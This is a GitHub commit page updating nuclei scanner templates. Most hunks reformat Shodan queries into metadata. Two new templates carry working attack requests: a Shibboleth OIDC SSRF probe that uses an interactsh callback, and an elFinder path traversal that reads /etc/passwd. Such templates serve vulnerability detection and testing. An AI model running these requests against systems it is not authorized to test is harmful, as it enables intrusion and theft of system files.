Skip to content

Commit f7e0436

Browse files
committed
update nuclei-templates 2022-07-05 22:27:1657031265
1 parent 3ab48f3 commit f7e0436

File tree

119 files changed

+935
-191
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

119 files changed

+935
-191
lines changed

config/nuclei-templates/cves/2021/CVE-2021-26855.yaml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,6 @@ info:
99
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
1010
- https://proxylogon.com/#timeline
1111
- https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
12-
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
1312
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
1413
remediation: Apply the appropriate security update.
1514
classification:

config/nuclei-templates/cves/2021/CVE-2021-40875.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ info:
1616
cve-id: CVE-2021-40875
1717
cwe-id: CWE-863
1818
metadata:
19-
shodan-query: https://www.shodan.io/search?query=TestRail
19+
shodan-query: http.html:"TestRail"
2020
tags: cve,cve2021,exposure,gurock,testrail
2121

2222
requests:

config/nuclei-templates/cves/2021/CVE-2021-41773.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ info:
1919
cve-id: CVE-2021-41773
2020
cwe-id: CWE-22
2121
metadata:
22-
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
22+
shodan-query: apache version:2.4.49
2323
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa
2424

2525
requests:
Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
id: CVE-2022-24129
2+
3+
info:
4+
name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery
5+
author: 0x_Akoko
6+
severity: high
7+
description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services.
8+
reference:
9+
- https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
10+
- https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
11+
- https://nvd.nist.gov/vuln/detail/CVE-2022-24129
12+
- http://shibboleth.net/community/advisories/
13+
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
15+
cvss-score: 8.2
16+
cve-id: CVE-2022-24129
17+
cwe-id: CWE-918
18+
tags: cve,cve2022,ssrf,oidc,shibboleth
19+
20+
requests:
21+
- method: GET
22+
path:
23+
- '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'
24+
25+
matchers-condition: and
26+
matchers:
27+
- type: word
28+
part: interactsh_protocol # Confirms the HTTP Interaction
29+
words:
30+
- "http"
31+
32+
- type: word
33+
part: interactsh_request
34+
words:
35+
- "ShibbolethIdp"
Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
id: CVE-2022-26960
2+
3+
info:
4+
name: elFinder - Path Traversal
5+
author: pikpikcu
6+
severity: critical
7+
description: |
8+
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
9+
reference:
10+
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
11+
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
12+
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
13+
- https://www.synacktiv.com/publications.html
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
16+
cvss-score: 9.1
17+
cve-id: CVE-2022-26960
18+
cwe-id: CWE-22
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2022,lfi,elfinder
22+
23+
requests:
24+
- raw:
25+
- |
26+
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
27+
Host: {{Hostname}}
28+
Content-Type: application/x-www-form-urlencoded
29+
30+
matchers-condition: and
31+
matchers:
32+
- type: regex
33+
regex:
34+
- "root:.*:0:0:"
35+
36+
- type: status
37+
status:
38+
- 200

config/nuclei-templates/default-logins/abb/cs141-default-login.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@ info:
1010
classification:
1111
cwe-id: CWE-798
1212
metadata:
13-
shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
13+
shodan-query: http.html:"CS141"
1414
tags: hiawatha,iot,default-login
1515

1616
requests:

config/nuclei-templates/default-logins/azkaban/azkaban-default-login.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,10 +5,10 @@ info:
55
author: pussycat0x
66
severity: high
77
description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
8-
reference:
9-
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
108
classification:
119
cwe-id: CWE-798
10+
metadata:
11+
shodan-query: http.title:"Azkaban Web Client"
1212
tags: default-login,azkaban
1313

1414
requests:
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: achecker-panel
2+
3+
info:
4+
name: AChecker Login Panel
5+
author: princechaddha
6+
severity: info
7+
tags: panel,achecker
8+
9+
requests:
10+
- method: GET
11+
path:
12+
- "{{BaseURL}}/checker/login.php"
13+
14+
matchers-condition: and
15+
matchers:
16+
17+
- type: word
18+
part: body
19+
words:
20+
- ": Web Accessibility Checker</title>"
21+
- "AChecker - Copyright"
22+
condition: and
23+
24+
- type: status
25+
status:
26+
- 200

config/nuclei-templates/exposed-panels/adobe/adobe-experience-manager-login.yaml

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,10 +6,11 @@ info:
66
severity: info
77
description: An Adobe Experience Manager login panel was detected.
88
reference:
9-
- https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
109
- https://business.adobe.com/products/experience-manager/adobe-experience-manager.html
1110
classification:
1211
cwe-id: CWE-200
12+
metadata:
13+
shodan-query: http.title:"AEM Sign In"
1314
tags: panel,aem,adobe
1415

1516
requests:

config/nuclei-templates/exposed-panels/adobe/adobe-media-server.yaml

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,10 +6,11 @@ info:
66
severity: info
77
description: An Adobe Media Server login panel was detected.
88
reference:
9-
- https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
109
- https://helpx.adobe.com/support/adobe-media-server.html
1110
classification:
1211
cwe-id: CWE-200
12+
metadata:
13+
shodan-query: http.title:"Adobe Media Server"
1314
tags: panel,adobe
1415

1516
requests:

config/nuclei-templates/exposed-panels/azkaban-web-client.yaml

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,9 +7,10 @@ info:
77
description: An Azkaban web client panel was discovered.
88
reference:
99
- https://azkaban.github.io/
10-
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
1110
classification:
1211
cwe-id: CWE-200
12+
metadata:
13+
shodan-query: http.title:"Azkaban Web Client"
1314
tags: panel,azkaban
1415

1516
requests:

config/nuclei-templates/exposed-panels/cisco/cisco-sendgrid.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Cisco ServiceGrid
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
7+
metadata:
8+
shodan-query: http.title:"Cisco ServiceGrid"
99
tags: panel,cisco
1010

1111
requests:

config/nuclei-templates/exposed-panels/clearpass-policy-manager.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: ClearPass Policy Manager - Aruba Networks
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
7+
metadata:
8+
shodan-query: http.title:"ClearPass Policy Manager"
99
tags: panel,aruba
1010

1111
requests:

config/nuclei-templates/exposed-panels/coldfusion-administrator-login.yaml

Lines changed: 2 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -4,10 +4,8 @@ info:
44
name: ColdFusion Administrator Login
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
97
metadata:
10-
shodan-query: http.component:"Adobe ColdFusion"
8+
shodan-query: http.title:"ColdFusion Administrator Login"
119
tags: panel,coldfusion,adobe
1210

1311
requests:
@@ -19,7 +17,7 @@ requests:
1917
matchers:
2018
- type: word
2119
words:
22-
- '<title>ColdFusion Administrator Login</title>'
20+
- 'ColdFusion Administrator Login'
2321

2422
- type: status
2523
status:

config/nuclei-templates/exposed-panels/cortex-xsoar-login.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Cortex XSOAR Login Panel
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22Cortex+XSOAR%22
7+
metadata:
8+
shodan-query: http.title:"Cortex XSOAR"
99
tags: panel,soar,login
1010

1111
requests:

config/nuclei-templates/exposed-panels/dell-openmanager-login.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Dell OpenManage Switch Administrator
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
7+
metadata:
8+
shodan-query: html:"Dell OpenManage Switch Administrator"
99
tags: panel,dell
1010

1111
requests:
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: docebo-elearning-panel
2+
3+
info:
4+
name: Docebo E-learning Login Panel
5+
author: pikpikcu
6+
severity: info
7+
metadata:
8+
verified: true
9+
fofa-query: title="Docebo E-learning"
10+
tags: panel,docebo
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- "Docebo E-learning"
23+
24+
- type: status
25+
status:
26+
- 200

config/nuclei-templates/exposed-panels/f-secure-policy-manager.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: F-Secure Policy Manager Server
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
7+
metadata:
8+
shodan-query: http.title:"F-Secure Policy Manager Server"
99
tags: login,panel
1010

1111
requests:

config/nuclei-templates/exposed-panels/faraday-login.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Faraday Login
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=html%3A%22faradayApp%22
7+
metadata:
8+
shodan-query: html:"faradayApp"
99
tags: panel,faraday
1010

1111
requests:

config/nuclei-templates/exposed-panels/glpi-authentication.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: GLPI - Authentication
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentication%22
7+
metadata:
8+
shodan-query: http.title:"GLPI - Authentication"
99
tags: panel,auth,glpi
1010

1111
requests:

config/nuclei-templates/exposed-panels/h2console-panel.yaml

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,8 @@ info:
77
reference:
88
- https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ
99
- https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console
10-
- https://www.shodan.io/search?query=http.title%3A%22H2+Console%22
10+
metadata:
11+
shodan-query: http.title:"H2 Console"
1112
tags: panel,h2,console
1213

1314
requests:

config/nuclei-templates/exposed-panels/hp-service-manager.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: HP Service Manager
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22HP+Service+Manager%22
7+
metadata:
8+
shodan-query: http.title:"HP Service Manager"
99
tags: panel,hp,service
1010

1111
requests:

config/nuclei-templates/exposed-panels/icinga-web-login.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Icinga Web 2 Login
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22
7+
metadata:
8+
shodan-query: http.title:"Icinga Web 2 Login"
99
tags: panel,icinga
1010

1111
requests:

config/nuclei-templates/exposed-panels/identity-services-engine.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Identity Services Engine
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
7+
metadata:
8+
shodan-query: http.title:"Identity Services Engine"
99
tags: panel
1010

1111
requests:

config/nuclei-templates/exposed-panels/lucee-login.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Lucee Web/Server Administrator Login
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22Lucee%22
7+
metadata:
8+
shodan-query: http.title:"Lucee"
99
tags: panel,lucee
1010

1111
requests:

config/nuclei-templates/exposed-panels/mongodb-ops-manager.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: MongoDB Ops Manager
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22
7+
metadata:
8+
shodan-query: http.title:"MongoDB Ops Manager"
99
tags: panel,mongodb
1010

1111
requests:

config/nuclei-templates/exposed-panels/nginx-proxy-manager.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: Nginx Proxy Manager
55
author: dhiyaneshDK
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=http.title%3A%22Nginx+Proxy+Manager%22
7+
metadata:
8+
shodan-query: http.title:"Nginx Proxy Manager"
99
tags: panel,nginx,proxy
1010

1111
requests:

config/nuclei-templates/exposed-panels/okiko-sfiler-portal.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,8 +4,8 @@ info:
44
name: OKIKO S-Filer Portal Detect
55
author: johnk3r
66
severity: info
7-
reference:
8-
- https://www.shodan.io/search?query=sfiler
7+
metadata:
8+
shodan-query: http.title:"S-Filer"
99
tags: okiko,panel
1010

1111
requests:

0 commit comments

Comments
 (0)